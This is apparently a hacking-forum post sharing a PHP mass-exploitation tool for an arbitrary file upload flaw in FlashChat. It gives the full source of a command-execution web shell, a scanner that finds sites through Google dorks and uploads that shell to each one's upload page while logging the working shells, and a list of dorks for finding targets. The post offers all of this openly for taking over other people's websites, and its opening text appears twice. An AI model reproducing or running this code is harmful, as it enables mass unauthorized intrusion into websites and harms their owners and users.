Hola! Xploiters,
Well, here is another scanner for you guys. You can use it in case you need some quick and easy shells. xD It targets the Arbitrary File Upload Vulnerability in FlashChat which is widely used on thousands of websites.
Just like VBulletin scanner, give it good dorks and it will do the rest for you.
Screenshot of the script in action:
![[Image: gUFgHDQ.png]](http://i.imgur.com/gUFgHDQ.png)
How to Use:
Use small shell in order to increase the scanning speed. Probably save the below code as g00n.php?
g00n.php
Aaaand here is the scanner...
FlashScan.php:
Here are some sample dorks:
Have fun.
Well, here is another scanner for you guys. You can use it in case you need some quick and easy shells. xD It targets the Arbitrary File Upload Vulnerability in FlashChat which is widely used on thousands of websites.
Just like VBulletin scanner, give it good dorks and it will do the rest for you.
Screenshot of the script in action:
How to Use:
Code:
1. Save this script as "FlashScan.php".
2. Place your PHP shell in the same directory as the FlashScan.php and name your shell as "g00n.php"
3. On Line#47 give the full path of g00n.php (shell)
4. Execute FlashScan.php and start hunting.Use small shell in order to increase the scanning speed. Probably save the below code as g00n.php?
g00n.php
Code:
<?php
echo "<h3>Works! Usage: g00n.php?g00n=[CMD]</h3>";
echo "<pre>";
$cmd = isset($_GET['g00n'])?$_GET['g00n']:"whoami";
echo passthru($cmd);
echo "</pre>";
echo "<br />g00n - Xploiter.net";
?>Aaaand here is the scanner...
FlashScan.php:
Code:
<?php
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
{
$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
$rank1 = $xml->SD[1];
if($rank1)
$rank = $rank1->POPULARITY->attributes()->TEXT;
else
$rank = 0;
return $rank;
}
function google_that($query, $page=1)
{
$resultPerPage=8;
$start = $page*$resultPerPage;
$url =
"http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q="
. urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}
function check_vuln($url) {
$shell = dirname($url) . '/temp/g00n.php';
$url = dirname($url) . '/upload.php';
$postFields = array();
$filePath = "D:\\xampp\\htdocs\\g00n.php";
$postFields['file'] = "@$filePath";
$curl_handle = curl_init();
curl_setopt($curl_handle, CURLOPT_URL, $url);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_handle, CURLOPT_POST, true);
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, $postFields);
$result = curl_exec($curl_handle);
curl_close($curl_handle);
if(strpos($result,"@g00n.php") != false)
return $shell;
else
return "Fail!";
}
?>
<html>
<head>
<meta name="Content-Type" content="text/html; charset=UTF-8">
<title>FlashChat Arbitrary File Upload - by g00n</title>
<style type="text/css">
body{ background-color:#000000; font: normal 14px Verdana; color:#ffffff;}
input{ border-width:0px; padding:2px; width:250px; }
a{ text-decoration:underline; color:#ffffff;}
#button{ width:50px;}
#result{margin:10px;}
#result span{display:block;}
#result .Y{background-color:green;}
#result .X{background-color:red;}
</style>
</head>
<body>
<center>
<br />
<h1><font color="green">FlashChat Scanner</font></h1>
[For FlashChat Arbitrary File Upload Vuln]<br /><font
size="1">Note: the bug was found by somebody else</font><br
/><br /><br />
<form method="post">
Google Dork:
<input type="text" id="dork" name="dork" value="<?php echo
(isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) :
'intitle:FlashChat v6'; ?>" />
<input type="submit" value="Start" id="button"/>
</form>
<?php
if(isset($_POST['dork']{0})) {
$file = fopen("g00nShellz.txt","a");
echo '<br /><div id="result"><b>Scanning has
been started... Good luck!
;)</b><br><br>';
letItBy();
for($googlePage = 1; $googlePage <= 50; $googlePage++) {
$googleResult = google_that($_POST['dork'], $googlePage);
if(!$googleResult) {
echo 'Finished scanning.';
fclose($file);
break;
}
for($victim = 0; $victim < sizeof($googleResult); $victim++){
$result = check_vuln($googleResult[$victim]['unescapedUrl']);
$alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
echo "Currently checking...";
if($result != "Fail!"){
$line = $result . " | " . $alexa . "\n";
fwrite($file,$line);
echo '<span class="Y">';
echo "SITE: <a
href=\"{$googleResult[$victim]['unescapedUrl']}\"
target='_blank'>{$googleResult[$victim]['unescapedUrl']}</a> -
<b>VULNERABLE</b>\n";
echo "<br /><a href=\"$result\" target=\"_blank\"><b>OPEN SHELL</b></a>";
echo " - Alexa Rank = <b>" . $alexa . "</b></span><br />";
}
else {
echo '<span class="X">';
echo "<a
href=\"{$googleResult[$victim]['unescapedUrl']}\"
target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a>
- NOT VULNERABLE";
if($alexa <= 50000)
echo " - " . $alexa;
echo "</span>\n<br />";
}
letItBy();
}
}
echo '</div>';
}
?>
<br /><br />
<font color="red" face="verdana" size="1"><b>Coded by g00n.<br />Greets: Xploiter.net</b></font>
</center>
</body>
</html>Here are some sample dorks:
Code:
intitle:FlashChat v6
inurl:flashchat.php
inurl:flashchat.php intitle:FlashChat v6
inurl:flashchat.php intitle:FlashChat v6 site:.net
inurl:flashchat.php intitle:FlashChat v6 site:.org
inurl:flashchat.php intitle:FlashChat v6 site:.uk
and so on...Have fun.
Post a Comment